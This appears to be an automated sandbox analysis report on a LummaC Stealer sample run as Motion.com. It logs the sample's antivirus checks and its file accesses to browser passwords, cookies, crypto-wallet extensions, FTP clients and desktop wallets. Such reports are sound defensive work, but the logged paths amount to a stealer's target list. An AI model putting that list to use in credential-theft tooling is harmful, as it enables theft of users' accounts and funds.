    Source: Motion.com, 00000011.00000000.1311651386.0000000000263000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405C44 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,0_2_00405C44
    Source: Amcache.hve.24.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.24.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.24.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.24.drBinary or memory string: MsMpEng.exe
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
    Tries to steal Crypto Currency Wallets
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
